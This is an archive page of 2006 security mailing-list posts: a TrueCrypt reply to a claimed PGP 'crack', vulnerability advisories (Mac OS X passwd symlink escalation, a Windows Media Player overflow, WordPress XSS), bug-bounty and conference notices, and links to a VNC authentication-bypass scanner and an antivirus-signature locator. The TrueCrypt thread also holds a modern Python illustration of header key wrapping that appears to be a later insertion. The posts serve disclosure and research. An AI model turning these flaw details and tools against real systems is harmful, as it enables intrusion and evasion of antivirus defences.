In conclusion, this is not a "security bug", but a design feature. Also, 
to exploit the design, the adversary would have to know your password 
first (or have your keyfiles). That means, for example, that he would 
capture it using a keystroke logger. If that was the case, then all 
security would be practically lost on that machine.

Sincerely,
Ennead
TrueCrypt Foundation


>  
> Hello,
> 
> Are you aware of this issue?
> 
> Regards,
> 
> Christopher.
> 
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, May 25, 2006 3:56 AM
> To: bugtraq@securityfocus.com
> Subject: A Nasty Security Bug that affect PGP Virtual Disks & PGP 
SDA , PGP
> 8.x & 9.x and Truecrypt.
> 
> A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 
8.x & 9.x
> and Truecrypt. 
> 
> 
> Affected Products:
> 
> 
> * PGP 8.x PGP 9.x maybe older version too
> 
> 
> * Truecrypt 4.2 maybe older version too
> 
> 
> // Full detail can be found here //
> 
> <> http://www.safehack.com/Advisory/pgp/PGPcrack.html
> 
> <> http://www.safehack.com/Advisory/truecrypt/truecrypt.html
> 
> 
> If you would like to watch the flash video check the following links.
> 
> <> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02
> 
>http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html
> 
> 
> <> truecrypt.html Tested on the latest version truecrypt-4.2.zip
> 
>http://www.safehack.com/Advisory/truecrypt/truecrypt.html
> 
>Note If you put stuff inside your test file you need to use a 
> 
>debugger to extract the data. If you just follow the video you 
> 
>will see how it is done without a debugger and an empty file.
> 
> 
> The How?
> 
> 
> 
> I was able to ACCESS PGP encrypted disks if the disk was encrypted with a
> passphrase or a public key. This method will work on both. Scary huh :-)
> 
> 
> You need the following tools:
> 
> --
> 
>1. A Brain
> 
>2. A Hex Editor.
> 
>3. PGP 8.1 Enterprise or Personal. You can use 9.x too. My feeling is
> this method will work on older versions too, because it is a design flaw in
> the PGP application, not in the PGP algorithm.
> 
>4. A Debugger. Not needed if you wanna backdoor PGP (OllyDbg)
> 
>
> 
> During my tests I have found that PGP Virtual Disk and PGP Self Extractable
> file (SDA) have a SERIOUS security bug. I would rather say a design bug.
> 
> 
> PGP disk or SDA can be cracked in 3 major steps:
> 
> 
> 
>1. Editing the PGP protected file using a hex editor. (Patching the
> passphrase).
> 
>2. Tracing the PGP protected file using a debugger. (You need a lot of time
> and coding/cracking experience)
> 
>3. Patching the responsible bytes.
> 
> 
> I have spent only a couple of days debugging but surely a lot more time is
> needed. But once the process is understood it is a question of finding the
> right
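
The header/master-key relationship that the TrueCrypt reply above relies on, modelled as an added example (not TrueCrypt's code or on-disk format; it uses PBKDF2 for the header key, an HMAC-SHA256 counter keystream standing in for the block cipher, and an HMAC tag standing in for the header checksum). It shows why changing the volume password never changes the master key, and therefore why a backup of the original header still opens the volume under the original password:

```python
"""Toy model of the encrypted-volume header design discussed above.

Constructed example, not TrueCrypt code: the real header layout, KDF
parameters and integrity check differ. Only the key relationship matters:
  header      = Enc(KDF(password, salt), master_key)
  volume data = Enc(master_key, data)
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Optional

KDF_ITERATIONS = 2000  # toy value; real volumes use far more iterations


def _keystream(key: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode; stands in for the block cipher."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), "sha256").digest()
        counter += 1
    return out[:length]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass(frozen=True)
class Header:
    salt: bytes                # per-header random salt for the KDF
    wrapped_master_key: bytes  # master key encrypted under the header key
    tag: bytes                 # stand-in for the header checksum


def derive_header_key(password: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password, salt, KDF_ITERATIONS, dklen=32)


def seal_header(master_key: bytes, password: bytes) -> Header:
    """Encrypt the master key under a key derived from `password`."""
    salt = os.urandom(16)
    hk = derive_header_key(password, salt)
    wrapped = _xor(master_key, _keystream(hk, len(master_key)))
    tag = hmac.new(hk, salt + wrapped, "sha256").digest()
    return Header(salt, wrapped, tag)


def open_header(header: Header, password: bytes) -> Optional[bytes]:
    """Return the master key, or None if the password does not fit the header."""
    hk = derive_header_key(password, header.salt)
    expected = hmac.new(hk, header.salt + header.wrapped_master_key, "sha256").digest()
    if not hmac.compare_digest(expected, header.tag):
        return None
    return _xor(header.wrapped_master_key, _keystream(hk, len(header.wrapped_master_key)))


def change_password(header: Header, old: bytes, new: bytes) -> Header:
    """Re-wrap the unchanged master key under a new header key."""
    master_key = open_header(header, old)
    if master_key is None:
        raise ValueError("old password does not open this header")
    return seal_header(master_key, new)


def encrypt_data(master_key: bytes, data: bytes) -> bytes:
    """Volume data is keyed by the master key only, never by the password."""
    return _xor(data, _keystream(master_key, len(data)))


def demo() -> dict:
    """Walk through the admin/user scenario from the quoted documentation."""
    master_key = os.urandom(32)
    admin_pw, user_pw = b"admin-secret", b"user-secret"  # constructed values
    admin_header = seal_header(master_key, admin_pw)    # admin keeps this backup
    sector = b"constructed volume sector"
    ciphertext = encrypt_data(master_key, sector)
    user_header = change_password(admin_header, admin_pw, user_pw)
    user_mk = open_header(user_header, user_pw)
    return {
        "user_pw_opens_current_header": user_mk == master_key,
        "admin_pw_rejected_by_current_header": open_header(user_header, admin_pw) is None,
        "admin_pw_opens_backup_header": open_header(admin_header, admin_pw) == master_key,
        "data_readable_after_password_change": encrypt_data(user_mk, ciphertext) == sector,
    }
```

Operationally, a saved header backup is equivalent to the credentials it was sealed with: guard it like the admin password itself, and treat a password change as ineffective against anyone holding an older copy of the header.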

Novell Client login form enables reading and writing from and to the clipboard of the logged-in user

2006-05-22 Thread [EMAIL PROTECTED]
clear
It has a task bar icon and clicking it clears the clipboard. I guess it will
not be suitable to run as a scheduled task since activating it only makes it
available at the task bar. It has no startup switches.

I tried to find a scheduler that can run an application at the event when
the workstation is being locked, but found only these two:
1. Funny, but someone asked just that at Novell's site and he was answered
that this can be done with NALRUN32 and NALRUNW from Novell's "Workstation
Manager" ("ZEN 2 Application Management Tool Kit"), but without a proper
example.
http://www.novell.com/coolsolutions/qna/4332.html
http://www.novell.com/coolsolutions/zenworks/features/a_zen2_toolkit_zw.html
#nalrun
2. The task scheduler of Windows Vista will be able to do this (when Windows
Vista is officially released...).
http://www.microsoft.com/technet/windowsvista/mgmntops/taskschd.mspx


Vendor Notification: Novell was notified of this issue more than two months
ago.
Due to my feeling that the company was not acting to solve this issue, I
notified them after one month that I would wait another month, and if at
that time the company had not published an advisory and/or a patch – I would
publish my own advisory.
Since the company has not publicly acted regarding this vulnerability within
this time frame, which I think is reasonable – this advisory is now
published.
Novell's lack of action may be due to the low-risk nature of this
vulnerability.


Credit:
Eitan Caspi
Israel
Email: [EMAIL PROTECTED]

 
Past security advisories:

1.
http://online.securityfocus.com/bid/4053
http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx
http://support.microsoft.com/default.aspx?scid=KB;en-us;315085&;

2.
http://online.securityfocus.com/bid/5972
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q329350

3.
http://online.securityfocus.com/bid/6280
http://www.securityfocus.com/archive/1/301624

4. 
http://online.securityfocus.com/bid/6736
http://online.securityfocus.com/archive/1/309442

5.
http://www.securityfocus.com/bid/7046
http://www.securityfocus.com/archive/1/314361

6.
http://www.securityfocus.com/archive/1/393800
http://service1.symantec.com/SUPPORT/ent-security.nsf/3d2a1f71c5a00334852568
0f006426be/c937e09a6ad4e20688256a22002724bb?OpenDocument


Articles:
You can find some articles I have written at
http://www.themarker.com/eng/archive/one.jhtml
(filter: Author = Eitan Caspi (second name set), From year = 2000 , Until
year = 2002)


Eitan Caspi
Israel

Professional Blog (Hebrew): http://www.notes.co.il/eitan
Personal Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi
Blog (English): http://eitancaspi.blogspot.com

"Technology is like sex. No Hands On - No Fun." (Eitan Caspi)





VNC_bypauth: vnc scanner multithreaded linux & windows

2006-05-17 Thread [EMAIL PROTECTED]
windows: http://heapoverflow.com/vnc_reloaded/VNC_bypauth-win32.rar
linux: http://heapoverflow.com/vnc_reloaded/VNC_bypauth-linux.tar.gz
comments: http://heapoverflow.com/viewtopic.php?p=1729

Hello J.Weatherall  :)



iDefense Q2 2006 Vulnerability Challenge

2006-05-17 Thread [EMAIL PROTECTED]

iDefense Labs is pleased to announce the launch of the next installment in
our quarterly vulnerability challenge. Last quarter's challenge focused
on critical vulnerabilities in Microsoft products and was a great
success. We would like to thank everyone who forwarded submissions
prior to the deadline on March 31, 2006. We look forward to announcing
award winners once public advisories become available for the
vulnerabilities.

For the second quarter of 2006, we're shifting the focus from vendor to
technology. This time around, we're focusing on database
vulnerabilities. For submissions received before June 30, 2006, iDefense
Labs will pay $10,000 for each vulnerability submission that results in
the discovery of a remotely exploitable database vulnerability that
meets the following criteria.

- Technologies:
 - Oracle Database 10G
 - Microsoft SQL Server 2005
 - IBM DB Universal Database 8.2
 - MySQL 5.0
 - PostgreSQL 8.1
- The vulnerability must be original and not previously disclosed either
 publicly or to the vendor by another party
- The vulnerability must be remotely exploitable in a default
 installation of one of the targeted technologies
- The vulnerability must exist in the latest version of the affected
 technology with all current patches/upgrades applied
- The vulnerability cannot be caused by or require third party software
- The vulnerability must result in root access on the target machine
- The vulnerability must not require the use of authentication
 credentials
- The vulnerability must receive the vendor's maximum severity ranking
 when the advisory is published (if applicable).

In order to qualify, the submission must be sent during the current
quarter and be received by midnight EST on June 30, 2006. The $10,000
prizes will be paid out following confirmation with the affected vendor
and will be paid in addition to any amount paid for the vulnerability
when it is first accepted. Only the initial submission for a given
vulnerability will qualify for the reward and a maximum of six awards
will be paid out. Should more than six submissions qualify, the first
six submissions will receive the reward.

Further details on the iDefense Vulnerability Contributor Program (VCP)
can be found at:

 http://labs.idefense.com/vcp.php

Michael Sutton
Director, iDefense Labs




New site about security conferences : www.security-briefings.com

2006-04-20 Thread [EMAIL PROTECTED]

Hello all,

We are proud to announce the release of a new site devoted to security 
conferences: http://www.security-briefings.com


Our goal is to highlight major information provided during the most 
popular and interesting conferences such as (but not limited to): 
Blackhat, Shmoocon, Defcon, Recon, Cansecwest, ... We will regularly 
update the site's content with what we think is important for 
security people.


Hope we can participate in the community effort to spread knowledge 
about security.


Regards
newslist [at] security-briefings.com



Re: [Full-disclosure] Re: [VulnWatch] [xfocus-SD-060314]Microsoft Office Excel Buffer Overflow Vulnerability

2006-03-16 Thread [EMAIL PROTECTED]
no, but our discoveries are all patched with the same patch, look at
the MS advisory closely:

http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx

Microsoft thanks <http://go.microsoft.com/fwlink/?LinkId=21127> the
following for working with us to help protect customers:

• Ollie Whitehouse of Symantec <http://symantec.com/> for reporting the
Microsoft Office Remote Code Execution Using a Malformed Routing Slip
Vulnerability - CVE-2006-0009

• FelicioX <mailto:[EMAIL PROTECTED]> for working with Microsoft on the
Microsoft Office Excel Remote Code Execution Using a Malformed Range
Vulnerability - CVE-2005-4131

• Peter Winter-Smith of NGS Software
<http://www.ngssoftware.com/index.htm> for reporting similar behavior
to the Remote Code Execution with Microsoft Office Excel Vulnerability
- CVE-2005-4131

• TippingPoint <http://www.tippingpoint.com/> and the Zero Day
Initiative <http://www.zerodayinitiative.com/> for reporting the
Microsoft Office Excel Remote Code Execution Using a Malformed File
Format Parsing Vulnerability - CVE-2006-0028

• Dejun of the Fortinet Security Response Team <http://www.fortinet.com>
for reporting the Microsoft Office Excel Remote Code Execution Using a
Malformed Description Vulnerability - CVE-2006-0029

• Eyas of the XFOCUS Security Team <http://www.xfocus.org/> for
reporting the Microsoft Office Excel Remote Code Execution Using a
Malformed Record Vulnerability - CVE-2006-0031


only FelicioX and NGSS found the same bug ;)

Thierry Zoller wrote:
> Dear XFOCUS Team,
>
> Is this the same vuln as discovered by class101 ?
> http://www.zerodayinitiative.com/advisories/ZDI-06-004.html
>
>
>




SyScan'06 Call For Papers

2006-03-06 Thread [EMAIL PROTECTED]

SyScan'06 CALL FOR PAPER

**ABOUT SYSCAN’06**
The Symposium on Security for Asia Network aims to be a very different 
security conference from the rest of the security conferences that the 
information security community in Asia has come to be so familiar and 
frustrated with. SyScan’06 intends to be a non-product, non-vendor 
biased security conference. It is the aspiration of SyScan’06 to 
congregate, in Singapore, the best security experts in their various 
fields, to share their research, discovery and experience with all 
security enthusiasts in Asia.


The speakers that will be at SyScan’06 are among the best, and 
brightest. These experienced security professionals at the vanguard of 
leading information security technology have assembled unique new 
material that they will present at this conference to help you maintain 
your technological leadership and stay abreast of the latest 
developments in this rapidly moving technological field.


This two-day symposium will be held in a relaxed and informal 
atmosphere, allowing all participants to enjoy themselves whilst 
expanding their knowledge on information security.


Besides the main conference, there will also be specialized security 
training courses at SyScan’06. These classes will be held before the 
main conference.


Dates:
Training - 18th and 19th July 2006
Conference - 20th and 21st July 2006

Venue: Swissotel Merchant Court Hotel, Singapore.

**SPEAKERS/TRAINERS PRIVILEGES**
Speakers at SyScan’06 will enjoy the following privileges.

Generic Privileges
• Return economy class air-ticket for one person.
• Hotel accommodation.
• Breakfast, lunch and dinner during conference.
• After-conference party.
• A healthy dose of alcohol.

Special Privileges
• *One selected speaker from each category will receive US$1,000 
honorarium in cash.

Selection will be based on the following criteria:
o New presentation not seen in any other conferences before.
• **Presentations that reveal unpublished/undisclosed 
vulnerabilities/exploits/techniques/malware will receive US$2,000 
honorarium in cash.

Selection will be based on the following criterion:
o Critical zero-day vulnerability, or
o Working exploits (can be reproduced and must have POC), or
o New techniques for:
 Discovery of vulnerability, or
 Exploiting existing vulnerability
o New form of malware.

**CFP COMMITTEE**
The SyScan'06 CFP Committee is made up of the following people:
1) Dave Aitel - Immunitysec
2) Matthew "Shok" Conover - Symantec
3) SK Chong - Scan Associates
4) Thomas Lim - SyScan

**CFP SUBMISSION**
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously.


2) Proposed presentation title, category, synopsis and description.

3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary requirement).

4) Employment and/or affiliations information.

5) Any significant presentation and educational experience/background.

6) Why is your material different or innovative or significant or an 
important tutorial?


All submissions must be in English in either MS Office, OpenOffice or 
PDF format. The more information you provide, the better the chance for 
selection. Please send submissions to [EMAIL PROTECTED]. Submission must be 
done no later than 30th April 2006.


**IMPORTANT DATES**
Final CFP Submission – 30th April 2006
Notification of Acceptance – 15th May 2006
Final Accepted Presentation Material Submission – 30th June 2006

**TOPICS**
The following categories are the focus for SyScan’06:

64-bit Vista
Mobile Devices
Malware
VoIP
Linux

The scope of the focus is broad and includes, but is not restricted to, the
following areas:

64-bit Vista
• Vulnerabilities
o Kernel
o Protocols
• Exploits
o Kernel
o Protocols
o Shellcodes
• Malware
o Virus
o Rootkit
o Spyware

Mobile Devices (embedded systems)
• Vulnerabilities
o Operating Systems
o Applications
• Exploits
o Operating Systems
o Applications
• Malware
o Virus

Malware
• Rootkits
• Spyware

VoIP
• Vulnerabilities
• Exploits

Linux
• Vulnerabilities
o Kernel
o Protocols
• Exploits
o Kernel
o Protocols

BotNets

Others
Any topics that will catch the attention of the CFP committee and/or the 
world.


**OTHER INFORMATION**
Please feel free to visit SyScan’06 website to get a feel what this 
conference is all about – SHARE AND HAVE FUN!


Also lookout here for the latest update on SyScAN’06.

*It is possible and not necessary that every category will have a 
speaker that will receive the US$1000 honorarium. The CFP committee of 
SyScan’06 will be the final arbitrator on this matter.


**If your presentation meets the criterion for both categories of 
honorarium, you will receive only the higher honorarium of US$2,000 in 
cash. The CFP committee of SyScan’06 will be the final arbitrator on 
this matter.


By agreeing to speak at the SyScan’06 you are granting SyS

DSplit - Tiny AV signatures Detector

2006-03-04 Thread [EMAIL PROTECTED]
DSplit is the small brother of an old tool known as UKsplitter, which is
now abandoned, does not work in VMware, and fails to run under Windows 2003.

DSplit has been coded for persons like me, targeted by AV firms, and
I'm not
responsible for the bad uses of it. I recall this method has been known for
a long time and it's up to the AV firms to review their detection
software.

http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org

usual critics, flames, can be directly sent to the Recycle Bin :>



iDefense Security Advisory 03.02.06: EMC Dantz Retrospect 7 Backup client DoS Vulnerability

2006-03-03 Thread [EMAIL PROTECTED]

EMC Dantz Retrospect 7 Backup client DoS Vulnerability

iDefense Security Advisory 03.02.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
March 02, 2006

I. BACKGROUND

EMC Dantz Retrospect is a network backup client designed for small
to mid-sized businesses. Dantz protects millions of computers
worldwide by providing enterprise class backup protection for servers,
notebooks, and business critical applications.

More information on this software package can be found on the
vendor's site:

 http://www.dantz.com

II. DESCRIPTION

The Dantz Retrospect 7 backup client listens on TCP port 497 for
commands from the central backup server. Sending a specially crafted
malformed packet to this socket can force the backup client to
terminate.

This allows for an unauthenticated attacker to effectively disable the
network backup services for a target network.

III. ANALYSIS

Exploitation appears to be limited to a DoS-only condition. From debug
log information it appears that the packet corruption is detected by
the application, which then decides to terminate rather than discard the
data. The following information may be found in the debug logs of
exploited machines:

Assertion failure at \retroclient\Win\winutil.c-1201
DebugFail: Client Terminated
Retrospect Client Terminated.

IV. DETECTION

This exploit has been tested with the Dantz Retrospect Client version
7.0.107. This is the latest available on the vendor's website.

The version available for Mac, 6.0, has also been tested
and is not vulnerable to the issue described in this document.

V. WORKAROUND

iDefense is unaware of any workaround for this issue.

VI. VENDOR RESPONSE

"This problem has been resolved in the latest updates to the Retrospect
Client for Windows versions 7.0.109 and 6.5.138 software. All customers
who use the Retrospect Client Software versions 6.5 or 7 are encouraged
to download and install the latest Retrospect Client software, at no
additional cost, from the EMC Web site at:

 http://www.emcinsignia.com/supportupdates/updates/retrospect/archive/

Retrospect Express and Retrospect 7.5 customers do not need this
update."

The EMC KB article for this issue is found at:

 http://kb.dantz.com/article.asp?article=8361&p=2

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/15/2005  Initial vendor notification
12/15/2005  Initial vendor response
03/02/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.





iDefense Security Advisory 03.02.06: Apple Mac OS X passwd Arbitrary Binary File Creation/Modification

2006-03-03 Thread [EMAIL PROTECTED]

Apple Mac OS X passwd Arbitrary Binary File Creation/Modification

iDefense Security Advisory 03.02.06
http://www.idefense.com/application/poi/display?type=vulnerabilities
March 02, 2006

I. BACKGROUND

Mac OS X is an operating system for the Apple family of microcomputers.
More information is available at the following link:

   http://www.apple.com/macosx/

II. DESCRIPTION

Local exploitation of a design error in version 10.3.9 of Apple Computer
Inc.'s Mac OS X could allow arbitrary files to be overwritten with user
supplied contents.

The /usr/bin/passwd binary is a setuid application which allows users to
change their password. There are two related vulnerabilities.

The first vulnerability occurs because the Mac OS X version of the
passwd utility accepts options specifying which password database to
operate on. The passwd binary does not check that the user has
permissions to create a file in the location specified and does not set
the created file permissions. By setting the file creation mask to 0 a
user can create arbitrary files owned by root, with permissions which
allow any user to change the contents.

The second vulnerability exists in the insecure creation of temporary
files with predictable names. The temporary filename created by the
process is in the form /tmp/.pwtmp.<pid> where <pid> is the process id
of the passwd process. By creating a symbolic link to the target file,
and then changing the password, it is possible to put controllable
contents into the target file.

III. ANALYSIS

Successful exploitation of either of these vulnerabilities would allow a
local attacker to gain elevated privileges in a number of ways.

In the case of the first vulnerability, a new file could be created in
the /etc directory, such as /etc/rc.local_tuning, which is sourced if it
exists during the system start up process as the root user.

The second vulnerability would allow an attacker to overwrite a file with
user controlled contents. This can be leveraged to provide privilege
escalation by, for example, creating a new /etc/sudoers file.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Mac OS X
Version 10.3.9. In addition, the following versions have been confirmed by
the vendor to be vulnerable:

* Mac OS X Server Version 10.3.9
* Mac OS X Version 10.4.5
* Mac OS X Server Version 10.4.5

It is suspected that all prior releases are vulnerable.

V. WORKAROUND

Remove the setuid bit from the /usr/bin/passwd binary by executing the
following command as root:

 chmod -s /usr/bin/passwd

This workaround will prevent non-root users from being able to change
their password.

VI. VENDOR RESPONSE

Apple have released an update for this vulnerability, details of which
are available at the following location:

   http://docs.info.apple.com/article.html?artnum=61798

Apple security updates are available via the Software Update mechanism:

   http://docs.info.apple.com/article.html?artnum=106704
  
Apple security updates are also available for manual download:


   http://www.apple.com/support/downloads

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to these issues:

  CVE-2005-2713 - passwd file creation and permissions

  CVE-2005-2714 - temporary file symlink problem

VIII. DISCLOSURE TIMELINE

08/23/2005  Initial vendor notification
08/27/2005  Initial vendor response
03/02/2006  Coordinated public disclosure

IX. CREDIT

Discovery of these vulnerabilities is credited to vade79.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDefense Security Advisory 03.02.06: Apple MacOS X BOMArchiveHelper Directory Traversal Vulnerability

2006-03-02 Thread [EMAIL PROTECTED]

Apple MacOS X BOMArchiveHelper Directory Traversal Vulnerability

iDefense Security Advisory 03.02.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=399
March 02, 2006

I. BACKGROUND

Mac OS X is an operating system for the Apple family of microcomputers.
More information is available at the following link:

   http://www.apple.com/macosx/

II. DESCRIPTION

Remote exploitation of a directory traversal vulnerability in Apple
Computer Inc.'s MacOS X could allow attackers to overwrite arbitrary
files with user-supplied contents.

III. ANALYSIS


Exploitation could allow a remote attacker to overwrite a file with
user-supplied contents. This can be leveraged to gain code execution on
the target machine by overwriting executable files such as login
scripts.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in MacOS X
10.4.2. Versions 10.4.5 and earlier of the 10.4.x family and version
10.3.9 of the 10.3.x family of both Mac OS X and Mac OS X Server are
vulnerable.

V. WORKAROUND

To prevent exploitation from occurring through the Safari web browser,
disable the 'Open safe file types' option in Safari. To achieve this,
within Safari choose Preferences, then choose General, then uncheck the
'Open safe file types' option.

VI. VENDOR RESPONSE

Apple has released Security Update 2006-001 to address this issue:

 http://docs.info.apple.com/article.html?artnum=303382

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-0391 to this issue.

VIII. DISCLOSURE TIMELINE

This issue was independently discovered by Stéphane Kardas of CERTA and
reported to the vendor.

03/02/2006  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



Re: WordPress 2.0.1 Multiple Vulnerabilities

2006-03-01 Thread [EMAIL PROTECTED]
> Risk: Critical! Impact: XSS, Full Path Disclosure, Directory
> Listing

Here a critical bug is arbitrary command execution, account ownage, etc.
An XSS isn't at all critical...

> <+ Full path disclosure & Directory listing +> When I discovered
> this bug, I reported it to some pepople before public disclosure, I
> was noticed that this isn't new and I decided to look why they
> haven't patch this bug.

so it's not that critical, medium but nothing critical ...



Javor Ninov wrote:
> wp-content/ is also prone to directory listing
>
>
> Javor Ninov aka DrFrancky
>
> [EMAIL PROTECTED] wrote:
>> /*
>> ---
>> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple
>> Vulnerabilities
>> ---
>> Program : WordPress 2.0 Homepage: http://www.wordpress.org
>> Vulnerable Versions: WordPress 2.0.1 & lower ones Risk: Critical!
>>  Impact: XSS, Full Path Disclosure, Directory Listing
>>
>> -> WordPress 2.0.1 Multiple Vulnerabilities <-
>> ---
>>
>> - Description
>> ---
>> WordPress is a state-of-the-art semantic personal publishing
>> platform with a focus on aesthetics, web standards, and
>> usability. What a mouthful. WordPress is both free and priceless
>> at the same time.
>>
>> - Tested
>> ---
>> Tested in localhost & many blogs
>>
>> - Bug
>> ---
>> The vendor was contacted about some other coding errors that are
>> not described here; the vendor was notified about these bugs when
>> this advisory was published.
>>
>> <+ Multiple XSS +> There're multiple XSS in `post comment':
>>
>> [1] `name' variable is not filtered when it's assigned to `value'
>>  on the `' in the form when the comment is posted. [2]
>> The same happens as [1] with the `website' variable. [3] `comment':
>> this variable only filters " and ' chars, which makes it possible to
>> use < and >, thus permitting an attacker to inject any HTML (or
>> script) code that he/she wants but without any " or ' character;
>> this only happens if the user that posts the comment is the
>> admin (any registered kind of `user').
>>
>> If you (or the victim) are an unregistered user, you can use " and ' in
>> your HTML/script injection using the `name' or `website' variables,
>> but if the victim is the admin or a registered user these 2
>> fields described above aren't available in the form so you cannot
>> even give a value to them. The only remaining option is to use
>> the `comment' variable but here we have the problem that we
>> cannot use " or ' in the HTML/script injected and we have to make the
>> admin post the comment (POST method).
>>
>> <+ Full path disclosure & Directory listing +> When I discovered
>> this bug, I reported it to some people before public disclosure,
>> I was notified that this isn't new and I decided to look at why they
>> haven't patched this bug.
>>
>> As this bug isn't patched yet, I tried to find out why and I found
>>  something like this in their forum (I don't know if the person
>> that posted this was the admin but it gives the explanation):
>> (Something like the following, it's not textual). `... these bugs
>> are caused by a badly configured .ini file, it's not a bug
>> generated by the script so it cannot be accepted as a bug of
>> WordPress...'. This is not an acceptable answer; if you think it
>> is, a bug caused because register_globals is Off is the .ini
>> file's fault and not the script's; they have to be kidding. If they want
>> to make good software, they have to do as much as the language
>> can to prevent all bugs.
>>
>> There're multiple files that don't check if they are being called
>> directly. This is a problem because they expect the functions
>> that the script is going to call to be declared. This kind
>> of bug is taken as a Low Risk bug, but it can help future
>> attacks.
>>
>> - Exploit
>> ---
>> -- Cross Site Scripting (XSS) PoC: [1] Post

iDefense Labs Quarterly Hacking Challenge

2006-02-15 Thread [EMAIL PROTECTED]

iDefense Labs is pleased to announce the launch of our quarterly hacking
challenge. Going forward, on a quarterly basis, we will select a new
focus for the challenge and outline the rules for vulnerability
discoveries that will qualify for the monetary rewards.

For the current quarter, iDefense Labs will pay $10,000 for each
vulnerability submission that results in the publication of a Microsoft
Security Bulletin with a severity rating of critical. In order to
qualify, the submission must be received by midnight EST on March 31,
2006. The $10,000 prizes will be paid out following the publication of
the Microsoft Security Bulletin and will be paid in addition to any
amount paid for the vulnerability when it is initially accepted.

Further details on the iDefense Vulnerability Contributor Program (VCP)
can be found at:

   http://labs.idefense.com/vcp.php

Further information about iDefense Labs, including access to open source
tools can be found at:

   http://labs.idefense.com

Michael Sutton
Director, iDefense Labs



iDefense Security Advisory 02.14.06: Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability

2006-02-14 Thread [EMAIL PROTECTED]

Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability

iDefense Security Advisory 02.14.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=393
February 14, 2006

I. BACKGROUND

Windows Media Player is a full featured Audio/Visual playback
application offered by Microsoft. The Windows Media Player package
also contains a plugin component that can be utilized from most
modern browsers such as Internet Explorer, Opera, Firefox, and Netscape.

More information on the product can be found from the Microsoft Windows
Media Web Site:

http://www.microsoft.com/windows/windowsmedia/default.aspx

II. DESCRIPTION

Windows Media Player (WMP) can be launched as a plugin in popular
browsers to view Windows Media Player file types from web pages.

A vulnerability in the Windows Media Player plugin can be triggered from
several popular browsers such as FireFox and Netscape. The issue
specifically can be triggered when certain browsers launch it with an
overly long embed src tag from a malicious html page.

Upon successful exploitation, attackers will be able to overwrite a
Structured Exception Handler (SEH) address and execute arbitrary code on
the system.

The vulnerability specifically lies in npdsplay.10001040 where a
user supplied string is copied to a stack based buffer:

  1000171A   C1E9 02        SHR ECX,2
>> 1000171D   F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  1000171F   8BC8           MOV ECX,EAX


III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
execute code within the context of the currently logged in user. The
victim would have to visit a malicious website using Firefox or Netscape
browsers and have Windows Media Player installed.

With properly crafted input the attacker is able to execute code of his
choice. Due to Unicode translations, shellcode characters are somewhat
limited to character code values below 0x80. Successful exploitation of
